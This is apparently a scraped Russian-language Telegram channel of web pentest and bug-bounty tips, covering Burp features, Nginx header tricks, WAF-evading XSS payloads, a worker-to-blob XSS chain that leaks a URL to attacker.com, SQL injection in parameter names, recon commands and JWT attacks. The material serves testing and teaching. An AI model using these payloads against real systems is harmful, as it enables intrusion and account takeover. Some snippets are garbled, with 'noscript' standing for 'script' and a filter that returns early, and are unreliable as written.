Обычно данные в формате JSON возвращаются с заголовком
Content-Type: application/json, что указывает браузеру на структурированные данные. Браузеры в таком случае не пытаются интерпретировать JSON как HTML или JavaScript.Content-Type: text/html (или другой неправильный тип)Используй Burp Bambda для поиска JSON-ответов с некорректным
Content-Type:id: 6620a595-520b-1ba2-2b20-5ea8568fdb89
name: Filter JSON responses with incorrect content type
function: VIEW_FILTER
location: PROXY_HTTP_HISTORY
source: |+
return !requestResponse.request().method().equals("OPTIONS");
var contentType = requestResponse.hasResponse() ? requestResponse.response().headerValue("Content-Type") : null;
if (contentType != null && !contentType.contains("application/json")) {
String body = requestResponse.response().bodyToString().trim();
return body.startsWith( "{" ) || body.startsWith( "[" );
}
return false;
P. S. Если ты не работал с Bambdas, то самое время наверстать упущенное. Эта фича представлена два года назад и позволяет кастомизировать Burp Suite прямо из пользовательского интерфейса с помощью небольших сниппетов Java-кода.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8❤🔥3❤1👍1
Макросы позволяют автоматически отправлять HTTP-запросы для поддержания состояния сессии или выполнять определенные действия перед основными запросами. Правила обработки сессий определяют, когда и как применять макросы к твоим запросам.
Когда использовать:
Шаг 1: подготовка запросов
Тебе понадобится три ключевых запроса:
Шаг 2: Настройка макроса
Project Options → Sessions → Macros → AddШаг 3: создание Session Handling Rule
Handling Rules → Add создай новое правилоRun a macro и укажи созданный макросШаг 4: запуск атаки
Null payloads и установи concurrent requests = 1Упрощенно воркфлоу сводится к двум простым шагам:
Please open Telegram to view this post
VIEW IN TELEGRAM
❤8
Nginx понимает несколько специальных заголовков от бэкенда при проксировании через
proxy_pass. Пример — в конфиге выше Бэкенду требуется возможность (или уязвимость), позволяющая внедрять произвольные заголовки ответа. Это часто встречается при SSRF — когда запросы идут на сервер атакующего.
@app.route('/')
def index():
headers = json.loads(unquote(request.args.get("headers")))
return Response("Hello, world!", headers=headers)Заголовок ответа
X-Accel-Redirect перепишет URL и выполнит повторную оценку конфигурации — в результате будет возвращён ответ по новому пути. Если установить его значение в
/internal, то будет использован обработчик для location /internal, даже несмотря на то, что запрошенный путь остаётся /. Это позволяет обойти проверку internal;, что обычно было бы невозможно при удалённом обращении.GET /?headers={"X-Accel-Redirect":"/internal"} HTTP/1.1HTTP/1.1 200 OK
...
Internal
X-Accel-Charset: задаёт charset в Content-TypeX-Accel-Buffering: включает или отключает буферизацию ответаX-Accel-Limit-Rate: скорость (в байтах в секунду) передачи клиентуX-Accel-Expires: время истечения кеша для ответаPlease open Telegram to view this post
VIEW IN TELEGRAM
❤8🔥1
Один из пограничных кейсов XSS — пэйлоад, выполняющийся внутри веб-воркера. Веб-воркеры исполняют JS в том же origin, но в изолированной среде: они лишены доступа к DOM,
window.open(), alert() и другим обычным window-API, которые доступны при классической XSS.fetch() в воркерах работает в том же origin, что и main window — значит с запросами отправляются куки, и при корректных CORS-заголовках можно читать ответы.// Отравление кеша
fetch("https://example.com/noscript.js", {
headers: { "X-Forwarded-Host": `"-alert(origin)-"` },
cache: "reload"
});
Воркеры могут отправлять сообщения в main window через
postMessage(). Если окно получает данные и вставляет их в DOM или выполняет eval без валидации — это путь к эскалации в полноценную XSS.// main window
const worker = new Worker("worker.js");
worker.addEventListener("message", (e) => {
alert(e.data); // потенциальная точка уязвимости
});
// worker.js
postMessage("Hello, world!");
Единственное общее хранилище между воркером и основным окном — можно читать/изменять данные.
В
WorkerGlobalScope доступен объект caches, общий для страницы и service воркера. Если использует кэш, воркер может перезаписать записи в cache storage — это дает вектор для XSS.Идея простая: создаешь HTML как
Blob, получаешь для него blob:-URL (URL.createObjectURL(blob)), а затем заставляешь браузер открыть этот URL в обычном контексте (не в воркере).blob:-URL имеет тот же origin, поэтому при открытии выполнится с доступом к DOM и localStorage.Проблема: навигация на
blob:-URL напрямую часто блокируется. Решение — «утечка» URL и интерактивный шаг пользователя:const blob = new Blob(['<noscript>alert(origin)</noscript>'], {type: "text/html"});
const url = URL.createObjectURL(blob);Процесс атаки:
1. В воркере создаешь Blob с финальным пейлоадом:
fetch("https://attacker.com/leak?" + new URLSearchParams({ url }));2. Линкуешь этот
blob:-URL наружу:fetch("https://attacker.com/leak?" + new URLSearchParams({ url }))3. Подготавливаешь подконтрольную страницу для drag & drop:
<a href="blob:https://example.com/...">Перетащи меня</a>
<noscript>
ondragstart = (e) => {
window.open("", "", "left=0,top=0,height=9999,width=9999");
e.dataTransfer.clearData();
e.dataTransfer.setData("text/uri-list", "blob:https://example.com/...");
}
</noscript>
Когда пользователь перетаскивает элемент, открывается полноэкранное окно, и при отпускании мыши
blob:-URL открывается в новой вкладке, выполняя XSS с доступом ко всем API. Работает как минимум в Chrome!Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6
По сути: это Turbo Intruder, заточенный под WebSocket, плюс HTTP-middleware для автоматизации.
Зачем это нужно
Как поставить
Extensions → BApp Store → WebSocket Turbo Intruder или CLI:java -jar WebSocketFuzzer-2.0.0.jar <noscriptFile> <requestFile> <endpoint> <baseInput>
Если ручной просмотр таблицы результатов не твой стиль, ты можешь обернуть WebSocket соединение внутри HTTP запроса, используя WebSocket Turbo Intruder HTTP Middleware.
def create_connection(upgrade_request):
connection = websocket_connection.create(upgrade_request)
return connection
def handle_outgoing_message(websocket_message):
results_table.add(websocket_message)
@MatchRegex(r'{"user":"You"')
def handle_incoming_message(websocket_message):
results_table.add(websocket_message)
Теперь ты можешь отправлять HTTP POST запрос на localhost, где тело запроса обрабатывается как WebSocket сообщение. Это позволяет сканировать любой WebSocket с помощью Burp Suite Pro или другого автоматизированного сканера.
POST /proxy?url=https://example.com/endpoint HTTP/1.1
Host: 127.0.0.1:9000
Content-Length: 16
{"message":"hi"}
Помимо обычных ошибок приложений, WebSockets создают свою уникальную поверхность для атак. Главная цель расширения — помочь тебе их найти и проэксплуатировать.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤8👍3
Функция createElement() используется для создания React-элементов. Она принимает три параметра:
const element = createElement(type, props, ...children)
type: может быть либо строкой с именем тега (т.е. div становится <div></div>), либо классом компонента, который будет вызван для построения элемента.props: может быть либо объектом, либо null. Пары ключ/значение в объекте будут присвоены создаваемому элементу как атрибуты, если type — строка с именем тега, или как свойства, если type — это класс компонента....children: дочерний узел (узлы) создаваемого элемента.Если ты можешь передать ввод из источника в sink
createElement() через один или несколько из этих параметров, он может влиять на генерацию HTML и достичь DOM XSS/CSS injection (в зависимости от версии).Предполагая,что ты контролируешь десериализованный JSON или сериализованный HTML, которые передаются в
createElement(), то параметры, которые ты можешь задать, определяют, чего ты можешь достичь Ресурсы:
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6
По умолчанию JDK в Burp ограничивает размер TLS-рукопожатия до 32KB (параметр
jdk.tls.maxHandshakeMessageSize). Это ломает перехват трафика у приложений с большими TLS Handshake сообщениями (обычно из-за длинной цепочки сертификатов).-Djdk.tls.maxHandshakeMessageSize=65536
в файл
.vmoptions Burp. Если файла нет — создай вручную и укажи путь через настройки запуска Burp.Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍2
Tom Hudson славится своими тулзами, которые выполняют ровно одну фичу, но делают это максимально эффективно. kxss — одна из таких
Тулза помогает быстро выявлять отраженные параметры для поиска XSS, показывая, какие параметры в ответах сервера отражаются, и какие спецсимволы проходят фильтрацию.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7
В пентесте/багбаунти часто нет полного скоупа или дают wildcard (
*.example.com). Тогда приходится искать самому — вот рабочий воркфлоу.Если у организации есть своя автономная система (AS):
asnmap -asn AS51115 -silent
echo "178.248.233.0/24" | dnsx -ptr -resp -o reverse_dns.txt
echo "178.248.233.0/24" | tlsx -p 443,3443,8443,9443,10443 -cn -san -o tlsx_result.txt
revwhoix -k "Positive Technologies, CJSC"
subfinder -d standoff365.com -silent
puredns bruteforce wordlist.txt standoff365.com -w subdomains_standoff365.com.txt
cat subdomains_standoff365.com.txt | alterx | dnsx -o alterx_resolved_subdomains_standoff365.com.txt
Создание словаря из найденных поддоменов часто приносит больше результатов, чем «слепой» общедоступный wordlist.
P. S. Чем шире поверхность атаки, тем больше шансов обнаружить неожиданные сервисы, забытые поддомены и «тёмные углы» инфраструктуры.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤15👍3
Главная цель — обход WAF, который блокирует типичные паттерны XSS.
Как это работает
onerror на eval позволяет выполнить сообщение об ошибке как кодБазовый прием — использование функции перед шаблонной строкой:
alert`test`
Более продвинутый вариант — создание функции из строки:
Function`alert\u00281\u0029` ``
Здесь скобки заменены на unicode-представление (
\u0028 и \u0029).Динамическое выполнение кода через
hash:Function`_${location.hash.slice`1`}` ``Ключевая идея: подмена
onerror на eval и создание валидного JS-кода из сообщения об ошибке:onerror = eval
throw '=alert\x281\u0029'
Сообщение об ошибке в Chrome:
Uncaught =alert(1), что является валидным кодом (Uncaught становится переменной).Без точки с запятой (используя блок):
{onerror=alert}throw 1Или через запятую:
throw onerror=alert,1
В Firefox формат ошибок другой, поэтому используются объекты
Error:throw onerror=eval,x=new Error,x.message='alert\x281\x29',x
Пейлоад через regexp и конкатенацию:
throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337,3331,117]+a[13]
Здесь:
a[12] и a[13] извлекают ( и ) из строки функции URL/1/g — regexp, который в строке становится "/1/g"Uncaught /1/g(1337,3331,117) — валидный кодМанипуляция с
TypeError.prototype.name:TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']
Изменяется имя
TypeError, чтобы сообщение об ошибке начиналось с =/, формируя regexp, который комбинируется с -alert(1).Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11❤3
Поиск багов, связанных с различиями в интерпретации HTTP-запросов разными серверами и прокси 😵💫
Любишь исследовать и искать коллизии при обработке HTTP-запросов? Тогда HTTP Garden — то, что тебе нужно!
Тулза сравнивает, как разные HTTP-серверы и прокси интерпретируют одинаковые запросы. Это особенно полезно для обнаружения HTTP Request Smuggling и других багов⤵️
1️⃣ Создай и запусти несколько серверов и прокси-серверов:
2️⃣ Запусти
3️⃣ Отправь тестовый запрос через HAProxy к серверам Gunicorn, Hyper и Nginx и проанализируй, совпадают ли их интерпретации:
Под капотом больше 35 известных веб- и 10 прокси-серверов + фичи для поиска артефактов в разных комбинациях серверов.
Любишь исследовать и искать коллизии при обработке HTTP-запросов? Тогда HTTP Garden — то, что тебе нужно!
Тулза сравнивает, как разные HTTP-серверы и прокси интерпретируют одинаковые запросы. Это особенно полезно для обнаружения HTTP Request Smuggling и других багов
./garden.sh start --build gunicorn hyper nginx haproxy
repl:./garden.sh repl
garden> payload 'GET / HTTP/1.1\r\nHOST: a\r\n\r\n' | transduce haproxy | fanout | grid
...
Под капотом больше 35 известных веб- и 10 прокси-серверов + фичи для поиска артефактов в разных комбинациях серверов.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9🔥2🤔1
Как эффективно находить связанные данные в API ⁉️
Когда API возвращает значение, одна запись (например, заказ пользователя) может быть связана с другими записями. Ты можешь обнаружить эти связанные данные с использованием существующих эндпоинтов.
Ищи всё, что заканчивается на
💡 Автоматизируй процесс с использованием правил поиска и замены в Burp:
Когда API возвращает значение, одна запись (например, заказ пользователя) может быть связана с другими записями. Ты можешь обнаружить эти связанные данные с использованием существующих эндпоинтов.
Ищи всё, что заканчивается на
_id (user_id, order_id, product_id). Эти элементы являются внешними ключами, связанными с базой данных.В Proxy > Options > Match and Replace задай в поле Match шаблон, который захватывает слово перед _id (например, user из user_id).
Выбери тип запроса: Request First Line (для путей, например /user_id/123) или Request Param Name (для параметров, например ?user_id=123).
Настрой замену для создания множественного числа: в поле Replace добавь 's' к захваченному слову (например, user_id превратится в users).
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3
Syntax Confusion: эксплуатация в дикой природе 🚨
Синтаксическая путаница возникает, когда два и более компонентов в системе по-разному интерпретируют один и тот же пользовательский ввод из-за неоднозначных или противоречивых правил синтаксиса.
Современные веб-приложения часто имеют цепочку парсеров: браузер нормализует ввод, CDN может его переписать, прокси пересылает дальше, фреймворк приложения парсит, а вспомогательные библиотеки интерпретируют заново.
Если на двух этапах ввод семантически «означает» разное, валидация, применённая на одном этапе, может перестать действовать на другом — и тогда от «санитизированного» ввода может остаться путь к эксплуатируемому поведению.
☝️ В языке программирования C определенные последовательности символов обрабатываются препроцессором и/или компилятором как один символ (digraphs и trigraphs). Python и Perl поддерживают экранирование Unicode-символов по именам символов.
Content-Disposition
Параметр
Альтернативный синтаксис с
Если система поддерживает
file URI и обход фильтров
Схема file URI обычно указывает на локальные файлы (
🔗 The Minefield Between Syntaxes: Exploiting Syntax Confusions in the Wild
Синтаксическая путаница возникает, когда два и более компонентов в системе по-разному интерпретируют один и тот же пользовательский ввод из-за неоднозначных или противоречивых правил синтаксиса.
Современные веб-приложения часто имеют цепочку парсеров: браузер нормализует ввод, CDN может его переписать, прокси пересылает дальше, фреймворк приложения парсит, а вспомогательные библиотеки интерпретируют заново.
Если на двух этапах ввод семантически «означает» разное, валидация, применённая на одном этапе, может перестать действовать на другом — и тогда от «санитизированного» ввода может остаться путь к эксплуатируемому поведению.
Content-Disposition
Параметр
filename заголовка Content-Disposition предлагает имена файлов для загружаемых или скачиваемых файлов:HTTP/1.1 200 OK
Content-Type: application/pdf
Content-Disposition: attachment; filename="invoice.pdf"
POST /upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="myfile.txt"
Content-Type: text/plain
Альтернативный синтаксис с
* позволяет указать кодировку и использовать URL-кодирование:Content-Disposition: form-data; name="file"; filename*=UTF8''myfile%0a.txt
Если система поддерживает
filename*, ты можешь ввести управляющие символы или обойти ограничения на имена файлов — это открывает дорогу к перезаписи файлов и другим кейсам.file URI и обход фильтров
Схема file URI обычно указывает на локальные файлы (
file:///path/to/file), но также допускает указание хоста: file://<host>/<path>. Используя схему URI файла с указанием хоста, можно обойти фильтры или получить DNS-запросы для отслеживания рабочего процесса в целевом приложении.Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤11
Как эффективно находить Client/Server Side Template Injection 🎆
1️⃣ Разведка — сначала технологии
Прогоняй приложение через Wappalyzer/builtwith и смотри, какие рендереры/фреймворки используются в разных частях приложения. Чем больше «технологических слоёв» — тем выше шанс найти багу.
2️⃣ Ищи неочевидные части приложения
CSTI/SSTI часто прячутся в экзотичных вьюхах: часть интерфейса может рендериться иначе и допускать интерпретацию шаблонов, которая «обычным» путём не видна. Если инъекция работает в одной части — проверь остальные.
3️⃣ После инъекции думай про импакт
🟠 CSTI → рассматривай способы получить
🟠 SSTI → от RCE до вытаскивания секретов — думай масштабно
💡 Полезные инструменты и ресурсы
🟠 SSTIMap, TInjA, tplmap
🟠 Template Injection Research
🟠 Evading defences using VueJS noscript gadgets
🟠 The Template Injection Playground
Прогоняй приложение через Wappalyzer/builtwith и смотри, какие рендереры/фреймворки используются в разных частях приложения. Чем больше «технологических слоёв» — тем выше шанс найти багу.
CSTI/SSTI часто прячутся в экзотичных вьюхах: часть интерфейса может рендериться иначе и допускать интерпретацию шаблонов, которая «обычным» путём не видна. Если инъекция работает в одной части — проверь остальные.
session cookies, localStorage или другие данные для ATOPlease open Telegram to view this post
VIEW IN TELEGRAM
❤4🔥2
Мы всегда пытаемся менять значения параметров в надежде зацепиться за нестандартное поведение, но что если экспериментировать с изменением имен параметров ¯\_(ツ)_/¯?
💨 Пример пэйлоада:
someparam[id) VALUES (NULL); WAITFOR DELAY '0:0:5';--]=test
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8😱1
Эксплуатация JSON web tokens: от теории к практике 🚀
По своей структуре JWT состоит из трёх частей — заголовка, пэйлоада и подписи:
➡️ Заголовок (header) передает информацию о типе токена и используемом криптографическом алгоритме.
➡️ Пэйлоад (payload) передает содержащиеся в токене так называемые утверждения (claims), которые делятся на три типа:
▪️ Стандартные — данные о токене (предназначение, издатель, срок действия).
▪️ Пользовательские — данные пользователя токена (имя, электронный адрес, номер телефона).
▪️ Нестандартные — специфические поля, необходимые для конкретных приложений.
➡️ Подпись (signature) гарантирует, что ни заголовок, ни пэйлоад не были изменены.
Большинство уязвимостей JWT возникают из-за неправильной настройки и некорректной проверки входных данных в процессе реализации. Разберем подробнее:
1️⃣ alg: none (отсутствие подписи) — если сервер принимает алгоритм
2️⃣ Отсутствие проверки подписи — пропуск валидации подписи позволяет любому модифицированному токену считаться валидным.
3⃣ Algorithm confusion (путаница алгоритмов) — смена
4⃣ Подмена JWK — динамическая загрузка публичных ключей (
5⃣ Инъекция через kid — небезопасная обработка поля
6⃣ Брутфорс слабых секретов — при использовании HMAC слабые или общие секреты можно подобрать перебором.
7⃣ Захардкоженные ключи — секреты, обнаруженные в исходниках, позволяют создать валидные токены.
Полезные инструменты и ресурсы:
🔗 Introduction to JSON Web Tokens
🔗 Exploiting JWT vulnerabilities: A complete guide
🔗 The JSON Web Token Toolkit v2
🔗 BurpSuite JWT Editor
🔗 PortSwigger Web Security Academy: JWT attacks
По своей структуре JWT состоит из трёх частей — заголовка, пэйлоада и подписи:
Большинство уязвимостей JWT возникают из-за неправильной настройки и некорректной проверки входных данных в процессе реализации. Разберем подробнее:
none, можно отправить unsigned-токен с изменёнными claims и пройти аутентификацию.alg (например, с RS256 на HS256) даёт возможность использовать публичный ключ как HMAC-секрет и подделать подпись.jwks.json) может быть использована для подмены ключа и принятия злонамеренно подписанных токенов.kid может привести к инъекции пути/URL или выбору неподходящего ключа для проверки.{
"alg": "RS256",
"kid": "example-key' OR UNION SELECT 'users'; --"
}$ john --wordlist=/path/to/wordlist.txt jwt.txt
Полезные инструменты и ресурсы:
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12❤2👀2